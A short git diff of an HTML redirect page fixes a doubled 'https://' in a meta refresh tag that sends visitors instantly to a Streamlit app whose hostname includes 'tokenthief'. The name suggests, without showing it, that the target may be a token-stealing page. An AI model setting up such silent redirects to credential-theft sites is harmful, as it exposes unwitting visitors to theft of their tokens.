--- a/blraqi.htm
+++ b/blraqi.htm
@@ -2,7 +2,7 @@
 <html lang="en">
 <head>
   <meta charset="UTF-8">
-  <meta http-equiv="refresh" content="0; url=https://https://blraqi-v1-tokenthief.streamlit.app/">
+  <meta http-equiv="refresh" content="0; url=https://blraqi-v1-tokenthief.streamlit.app/">
   <title>Redirecting...</title>
 </head>
 <body>
